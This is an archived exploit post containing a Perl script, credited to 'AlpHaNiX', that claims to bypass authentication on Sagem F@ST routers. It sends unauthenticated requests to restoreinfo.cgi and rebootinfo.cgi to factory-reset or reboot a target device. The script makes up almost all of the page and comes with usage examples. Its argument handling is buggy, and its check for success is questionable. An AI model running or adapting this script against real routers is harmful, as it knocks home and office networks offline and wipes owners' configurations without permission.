Home / os / winme

Sagem Routers Remote Auth bypass Exploit

Posted on 04 March 2010

========================================
Sagem Routers Remote Auth bypass Exploit
========================================

#!/usr/bin/perl
# Exploit Title: Sagem routers Remote auth bypass Exploit
# Date: 04/03/2010
# Author: AlpHaNiX
# Software Link: null
# Version: Sagem Routers F@ST (1200/1240/1400/1400W/1500/1500-WG/2404
# Tested on: Sagem F@ST 2404
 
 
# Code :
 
use HTTP::Request;
use HTTP::Headers;
use LWP::UserAgent;
system('cls');
 
sub help()
{
    print "
[X] the target must be sagem rooter main ip adress
".
          "[X] affected Versions : Sagem Routers F@ST (1200/1240/1400/1400W/1500/1500-WG/2404)
".
          "[X] Usage   : perl $0 --function ip 
".
          "[X] Example : ./exploit.pl<http://exploit.pl> --reset 192.168.1.1 
".
          "[X] Example : ./exploit.pl<http://exploit.pl> --reboot 192.168.1.1 
";
}
sub header()
{
    print "
[+]====================================[+]
".
          "[+] Sagem routers Remote Auth bypass   [+]
".
          "[+] Found And Exploit By AlpHaNiX      [+]
".
          "[+] Contact  : AlpHa[at]Hacker[dot]Bz  [+]
".
          "[+] HomePage : NullArea.Net            [+]
".
          "[+]====================================[+]


"
}
sub resetz()
{
    my $target = $ipz."restoreinfo.cgi" ;
    my $request = HTTP::Request->new(GET=>$target);
    my $useragent = LWP::UserAgent->new();
    my $response = $useragent->request($request);
    if($response->content =~ m/<HTML><HEAD><TITLE>401 Unauthorized</TITLE></HEAD>/i && $response->content =~ m/<BODY BGCOLOR="#cc9999"><H4>401 Unauthorized</H4>/ && $response->content =~ m/<ADDRESS><A HREF="http://www.acme.com<http://www.acme.com>/software/micro_httpd/">micro_httpd</A></ADDRESS>/ )
    {
        print "[+] Authentication bypassed !
" ;
        print "[+] Exploited , $ip is restored" ;
    }
    else
    {
        print "[+] Please make sure you entered real sagem router ip
" ;
    }
}
 
sub reboot()
{
    my $target = $ipz."rebootinfo.cgi" ;
    my $request = HTTP::Request->new(GET=>$target);
    my $useragent = LWP::UserAgent->new();
    my $response = $useragent->request($request);
    if($response->content =~ m/<HTML><HEAD><TITLE>401 Unauthorized</TITLE></HEAD>/i && $response->content =~ m/<BODY BGCOLOR="#cc9999"><H4>401 Unauthorized</H4>/ && $response->content =~ m/<ADDRESS><A HREF="http://www.acme.com<http://www.acme.com>/software/micro_httpd/">micro_httpd</A></ADDRESS>/ )
    {
        print "[+] Authentication bypassed !
" ;
        print "[+] Exploited , $ip is rebooted" ;
    }
    else
    {
        print "[+] Please make sure you entered real sagem router ip
" ;
    }
}
 
if (@ARGV != 2) { header();help(); exit(); }
else{
 
    my $i=0;
    foreach (@ARGV)
    {
        if ($ARGV[$i] eq "--reboot"){$ip = $ARGV[$i+1];$function = 'reboot';}
        if ($ARGV[$i] eq "--reset"){$ip = $ARGV[$i];$function = 'reset';}
        $i++;
      }
 
if ($ip =~ /http:/// ) { $ipz = $ip."/"; } else { $ipz = "http://".$ip."/"}
 
header();
print "[+] Working on $ip ..

";
if($function eq 'reboot'){reboot()}
if($function eq 'reset'){resetz()}
}


# ~  - [ [ : Inj3ct0r : ] ]

 

TOP

Malware :

Exploits :